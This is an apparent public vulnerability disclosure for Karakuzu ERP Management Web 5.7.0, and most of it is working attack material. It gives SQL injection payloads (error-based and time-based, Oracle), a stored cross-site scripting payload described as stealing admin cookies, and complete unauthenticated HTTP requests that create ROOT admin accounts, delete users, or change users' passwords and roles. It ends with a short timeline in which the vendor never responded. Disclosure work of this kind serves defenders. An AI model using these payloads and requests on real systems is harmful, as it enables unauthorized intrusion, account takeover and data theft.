# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection # Discovery Date: 2019-09-20 # Exploit Author: Hakan TAŞKÖPRÜ # Vendor Homepage: http://karakuzu.info/ # Effected Version <= 5.7.0 Vulnerability #1: Unauthenticated SQL Injection ================================================== Type: Error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND 1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))-- DhDH&k_yetki_duz=USER&kullanici_duzenle= Type: Time-based blind Title: Oracle AND time-based blind Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND 6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)-- VuHD&k_yetki_duz=USER&kullanici_duzenle= POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle= Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and k_sifre_duz parameters are injectable/vulnerable. Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User Management Panel ======================================================================================= Description : An attacker can stole an admin’s cookie. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)" autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #3: Unauthenticated Creating Admin User ====================================================== Description : An attacker can create an admin or normal account. Request: POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit= Vulnerability #4: Unauthenticated Deleting User ============================================= Description : An attacker can delete an admin or normal account. POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded kullanici_sil=k_adi_duz=USERNAME_TO_DELETE Vulnerability #5: Unauthenticated Editing User =============================================== Description : An attacker can change a user’s password or role(e.g ROOT). POST /TARGET_PATH/netting/islem2.php HTTP/1.1 Host: TARGET Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle= ### History ============= 2019-09-20 Issue discovered 2019-11-19 Vendor contacted (No response) 2020-01-03 Issue published